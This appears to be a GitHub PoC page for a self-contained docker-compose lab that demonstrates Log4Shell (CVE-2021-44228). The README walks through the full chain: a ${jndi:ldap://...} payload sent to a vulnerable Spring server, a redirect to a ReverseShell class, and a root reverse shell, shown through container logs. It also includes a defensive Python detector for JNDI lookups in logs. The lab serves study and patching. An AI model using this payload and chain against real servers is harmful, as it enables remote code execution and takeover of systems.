
CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Associated Vulnerability

Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)

Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Self-contained lab environment that runs the exploit safely, all from docker compose
Readme
# Self-contained lab environment PoC that runs a reverse-shell with Log4Shell (CVE-2021-44228)

This is a self-contained lab environment that runs the exploit safely, all from docker compose.

The affected versions are **Apache Log4j 2.0 through 2.14.1**; the issue is tracked as **CVE-2021-44228** (CVSS score: 10.0).

### Patch Apache Log4j to version 2.16+ as soon as possible!

## Prerequisites

This code requires Docker and Docker Compose.

## Description
The `Dockerfile`s and `docker-compose.yml` are self-explanatory; they build and start the lab environment.

The victim server [log4shell-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/log4shell-server) is built from a [spring initializr](https://start.spring.io) demo project and pulls in the vulnerable Log4j 2.14.1 through [spring-boot-starter-log4j2 2.6.1](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/log4shell-server/build.gradle#L19).

The vulnerable code is located inside [DemoApplication.java](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/log4shell-server/src/main/java/com/example/demo/DemoApplication.java#L29).

The [Remote Code Execution](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/rce-server/src/ReverseShell.java#L8) payload class is served by the [rce-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/rce-server).

The intermediate [LDAP server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/ldap-server) is based on [Java Unmarshaller Security - Turning your data into code execution](https://github.com/mbechler/marshalsec).

The attack vector is sent from [this script](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/attack-vector/attack-vector.sh#L13); it makes the victim open a connection back to the [reverse-shell](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/reverse-shell) server.

The [reverse-shell server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/reverse-shell) waits for that connection and sends an [example command](https://github.com/j3kz/CVE-2021-44228-PoC/blob/124fd08f9e3fb5f455ffa5b1a5d8308abe51e5a8/reverse-shell/reverse-shell.sh#L3), `echo $(whoami)`, through the reverse shell; the command is executed on the victim server [log4shell-server](https://github.com/j3kz/CVE-2021-44228-PoC/tree/master/log4shell-server).


## Usage:

```bash
git clone https://github.com/j3kz/CVE-2021-44228-PoC.git
cd CVE-2021-44228-PoC
docker compose up
```

```
ldap-server       | Listening on 0.0.0.0:1389
```
LDAP server ready and listening.

```
reverse-shell     | listening on [::]:4242 ...
```
Reverse-shell server ready and listening.

```
log4shell-server  |
log4shell-server  |   .   ____          _            __ _ _
log4shell-server  |  /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
log4shell-server  | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
log4shell-server  |  \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
log4shell-server  |   '  |____| .__|_| |_|_| |_\__, | / / / /
log4shell-server  |  =========|_|==============|___/=/_/_/_/
log4shell-server  |  :: Spring Boot ::                (v2.6.1)
log4shell-server  |
log4shell-server  | 2021-12-18 12:31:37.695  INFO 1 --- [           main] c.e.d.DemoApplication                    : Starting DemoApplication using Java 1.8.0_181 on 46edaaf2f7eb with PID 1 (/app/spring-boot-application.jar started by root in /)
log4shell-server  | 2021-12-18 12:31:37.739  INFO 1 --- [           main] c.e.d.DemoApplication                    : No active profile set, falling back to default profiles: default
log4shell-server  | 2021-12-18 12:31:42.337  INFO 1 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat initialized with port(s): 8080 (http)
log4shell-server  | 2021-12-18 12:31:42.439  INFO 1 --- [           main] o.a.c.c.StandardService                  : Starting service [Tomcat]
log4shell-server  | 2021-12-18 12:31:42.440  INFO 1 --- [           main] o.a.c.c.StandardEngine                   : Starting Servlet engine: [Apache Tomcat/9.0.55]
log4shell-server  | 2021-12-18 12:31:42.717  INFO 1 --- [           main] o.a.c.c.C.[.[.[/]                        : Initializing Spring embedded WebApplicationContext
log4shell-server  | 2021-12-18 12:31:42.718  INFO 1 --- [           main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 4549 ms
log4shell-server  | 2021-12-18 12:31:44.660  INFO 1 --- [           main] o.s.b.w.e.t.TomcatWebServer              : Tomcat started on port(s): 8080 (http) with context path ''
```
Vulnerable server ready and listening.

```
attack-vector     | 👌 log4shell-server:8080 is listening!
attack-vector     | 🚀 Sending attack vector ...
```
The attack-vector container waits until the victim is reachable, then sends the attack vector.

```
log4shell-server  | 2021-12-18 12:31:44.740  INFO 1 --- [           main] c.e.d.DemoApplication                    : Started DemoApplication in 8.402 seconds (JVM running for 11.113)
log4shell-server  | 2021-12-18 12:31:45.110  INFO 1 --- [nio-8080-exec-1] o.a.c.c.C.[.[.[/]                        : Initializing Spring DispatcherServlet 'dispatcherServlet'
log4shell-server  | 2021-12-18 12:31:45.110  INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Initializing Servlet 'dispatcherServlet'
log4shell-server  | 2021-12-18 12:31:45.112  INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet                : Completed initialization in 2 ms
ldap-server       | Send LDAP reference result for attack-vector redirecting to http://rce-server:3000/ReverseShell.class
rce-server        | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] "GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"
```
The vulnerable server handles the request and logs it, which triggers the JNDI lookup; the LDAP server answers with a reference that redirects the victim to the RCE server, from which the payload class is fetched over HTTP.

```
reverse-shell     | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:43877 ([::ffff:172.31.0.3]:43877)
reverse-shell     | 👻 Hello from the log4shell-server! We are root.
reverse-shell     | listening on [::]:4242 ...
reverse-shell     | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:41249 ([::ffff:172.31.0.3]:41249)
```
The payload runs and the victim server opens the reverse shell; the reverse-shell server can now execute remote commands.

```
log4shell-server  | 2021-12-18 12:31:45.187  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello  param:name: ReverseShell@22fb868
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:host: log4shell-server:8080
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:user-agent: curl/7.80.0
log4shell-server  | 2021-12-18 12:31:45.345  INFO 1 --- [nio-8080-exec-1] Demo                                     : GET /hello header:accept: */*
```
The victim server logs the attack-vector request. Note that by the time the `name` parameter is written out, the `${jndi:...}` lookup has already been resolved to the string form of the loaded `ReverseShell` object.

```
attack-vector     | 🔥 Server returned:
attack-vector     | > HTTP/1.1 200
attack-vector     | > Content-Type: text/plain;charset=UTF-8
attack-vector     | > Content-Length: 52
attack-vector     | > Date: Sat, 18 Dec 2021 12:31:45 GMT
attack-vector     | >
attack-vector     | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!
attack-vector     | Attack should be successfull, have a nice day!
```
The attack-vector container prints the HTTP response and exits. The response body still contains the raw `${jndi:...}` string, because the substitution happens only when Log4j formats the log message, not when the controller echoes the parameter.
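A defender-side check for request logs like the ones shown above, written as an added example that is not part of the original project: it scans log lines for `${jndi:` lookups the way the victim's Log4j would see them, first collapsing the nested `lower:` and `:-default` lookup forms that Log4j resolves from the inside out, and reports the JNDI scheme per hit (this generalizes beyond the single plain lookup the lab sends). The sample log lines, hosts and paths are constructed for the example.

```python
import re

# Constructed sample lines modelled on the lab's log4shell-server output;
# the second and third carry lookups, the hosts and paths are made up.
SAMPLE_LOG = """\
12:31:45.345 INFO Demo : GET /hello header:user-agent: curl/7.80.0
12:31:45.187 INFO Demo : GET /hello param:name: ${jndi:ldap://ldap-server:1389/attack-vector}
12:31:46.001 INFO Demo : GET /hello header:x-api-version: ${${lower:J}ndi:rmi://10.0.0.5:1099/x}
12:31:47.002 INFO Demo : GET /hello param:name: ${java:version}
"""

# An innermost ${...} lookup, i.e. one with no further "${" inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup and the URI scheme it points at (lookup keys are case-insensitive).
JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(inner: str) -> str:
    """Apply the transformations Log4j's own substitutor performs before the
    jndi lookup runs: the lower: lookup and the ':-default' fallback syntax.
    Anything else is left as the literal ${...} so it can still be inspected."""
    if inner.startswith("lower:"):
        return inner[6:].lower()
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    return "${" + inner + "}"


def normalize(text: str) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    while True:
        new = INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            return text
        text = new


def find_jndi_lookups(log_text: str):
    """Return (line_no, scheme, normalized_line) for every line that carries a
    JNDI lookup once nesting has been collapsed; benign lookups such as
    ${java:version} are not reported."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm))
    return hits
```

Running `find_jndi_lookups(SAMPLE_LOG)` reports line 2 (ldap) and line 3 (rmi) and ignores the plain `${java:version}` lookup and the user-agent line.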

## Disclaimer
This repository is only about learning from the vulnerability.

The project is not intended to be and cannot be used as a malicious exploit of CVE-2021-44228 without the consent of the victim server's owner.

**Any usage for malicious activity is prohibited and punished by severe laws.**


## References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

https://www.lunasec.io/docs/blog/log4j-zero-day/

https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

https://github.com/christophetd/log4shell-vulnerable-app
File Snapshot

```
/data/pocs/33bee60811603a4bac855180b18306ac9b6e7b16
├── [4.0K] attack-vector
│   ├── [ 682] attack-vector.sh
│   └── [ 116] Dockerfile
├── [1.2K] docker-compose.yml
├── [4.0K] ldap-server
│   └── [ 546] Dockerfile
├── [ 37K] LICENCE
├── [4.0K] log4shell-server
│   ├── [ 597] build.gradle
│   ├── [ 332] Dockerfile
│   ├── [4.0K] gradle
│   │   └── [4.0K] wrapper
│   │       ├── [ 58K] gradle-wrapper.jar
│   │       └── [ 202] gradle-wrapper.properties
│   ├── [7.9K] gradlew
│   ├── [2.7K] gradlew.bat
│   ├── [  26] settings.gradle
│   └── [4.0K] src
│       ├── [4.0K] main
│       │   ├── [4.0K] java
│       │   │   └── [4.0K] com
│       │   │       └── [4.0K] example
│       │   │           └── [4.0K] demo
│       │   │               └── [1.1K] DemoApplication.java
│       │   └── [4.0K] resources
│       │       └── [   1] application.properties
│       └── [4.0K] test
│           └── [4.0K] java
│               └── [4.0K] com
│                   └── [4.0K] example
│                       └── [4.0K] demo
│                           └── [ 206] DemoApplicationTests.java
├── [4.0K] rce-server
│   ├── [ 770] Dockerfile
│   └── [4.0K] src
│       └── [ 678] ReverseShell.java
├── [7.9K] README.md
└── [4.0K] reverse-shell
    ├── [  88] Dockerfile
    └── [ 157] reverse-shell.sh

20 directories, 20 files
```